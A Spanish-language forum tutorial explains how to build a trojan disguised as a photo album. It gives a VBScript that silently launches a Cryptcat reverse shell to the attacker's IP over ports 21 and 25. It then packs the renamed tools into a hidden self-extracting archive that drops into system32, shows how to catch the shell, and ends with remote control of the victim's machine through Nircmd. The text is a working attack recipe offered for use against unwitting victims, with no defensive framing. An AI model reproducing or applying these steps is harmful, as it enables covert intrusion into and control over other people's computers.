weno, les enseñaré como obtener shell con netcat o cryptcat y de este modo poder troyanisar la pc victima, a la que podamos subir y bajar archivos hasta abrir la lectora del cd aparte de muchas cosas mas ^^.
pero eso ya es cosa de la imaginación de cada uno
En lo personal prefiero Cryptcat ya que es exactamente lo mismo que netcat solo que mas seguro
para este metodo necesitamos lo siguiente:
1.-Cryptcat
2.-Winrar
3.-Nircmd
4.- Alguna foto, juego o alguna otra cosa para no levnatar sospecha
5.- Un pekeño script en visual basic y batch
Bien, manos a la obra
ponemos todos los archivos en una carpeta y renombramos los archivos, algo que no sea comun por ejemplo run32dll, igfxdll, inetcpe, etc
en este caso kedará asi:
cryptcat = run32dll
nircmd=igfxdll
script=inetcpe
foto = imon32
seguimos, en esta ocacion ocuparemos una shell volteada, esto kiere decir que ocuparemos los puertos 21 (ftp) y 25 (smtp) para que el firewall no nos moleste
el script que vamos a hacer es para que no aparezca la ventana de ms-dos al ejecutar la shell volteada en la pc victima.
el script es el siguiente:
set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
"run32dll.exe NUESTRA-IP 21 |cmd.exe| run32dll.exe NUESTRA-IP 25"""
set b=shell.CreateTextFile("w.bat")
b.close
set d=shell.OpenTextFile("w.bat",2)
d.write dta
d.close
cmd.run "w.bat", vbHidecopiamos ese code en un block de notas, asegurense de cambiar donde dice "NUESTRA-IP" por su ip, recuerden que para hacer eso nos vamos a inicio-ejecutar-cmd y ahi ponemos ipconfig y nos dará nuestra ip
guardamos es script con el nombre de inetcpe.vbs
bien ya tenemos todo lo necesario, ahora solo nos keda juntarlo con el winrar de la sig manera:
seleccionamos los 4 archivos, click derecho y add to archive, o agregar al archivo
seleccionamos lo sig:
metodo de compresion: la mejor
crear archivo sfx
y borrar archivos despues de archivarlos
despues de esto, nos vamos a la pestaña "avanzado" y damos click en optiones sfx
donde dice: path to extract o localizacion de la extracción ponemos lo siguiente:
c:\widows\system32
esto es para que los archivos se extraigan dentro de la carpeta system32
y donde dice Run after extraction o ejecutar tras la estracción pones cualkier cosa
despues de esto, nos vamos a la pestaña modos y seleccionamos hide all o esconder todo y skip existing files o sobreescribir archivos
damos aceptar y nos vamos a la pestaña comentarios
nos saldrá una pantalla parecida a esta
vamos a modificar los comentarios de la sig forma:
damos aceptar y listo ya tenemos nuestro troyano creado
cambiamos el nombre a nuestro archivo por ejemplo en mi caso "album de fotos"
bien, ese archivo es el que le debemos de mandar a la victima
pero para eso antes nosotros debemos abrirl el cryptcat y poner lo siguiente:
abrimos el cryptcat y ponemos -vvlp 21
abrimos otra consola y ponemos lo siguiente -vvlp 25
una vez que le mandemos el archivo a la victima obtendremos shell
ejecuté el archivo en mi pc parta que vean y keda asi:
solo vemos la foto pero al mismo tiempo tenemos shell
una vez que tengamos shell, escribimos los comandos en la ventana donde pusimos esto -vvlp21 y en la otra ventana veran el resultado de la consulta.
ahora se preguntaran para que es el nircmd que pusimos al principio y al cual le pusimos el nombre de: igfxdll
bueno es para poder manejar un poco la pc de la victima, como por ejemplo
en la shell ponemos este comando:
igfxdll.exe open cdrom d:
y se la abrirá el cdrom a la victima ^^
weno con este programa se pueden hacer muchas maldades mas pero eso les toca a uds
espero les haya gustado el tuto
aki estan las herramientas
http://rapidshare.com/files/87150425/TUTO.rar.htmlsaludos
Devilboy
Mostrar Mensajes
.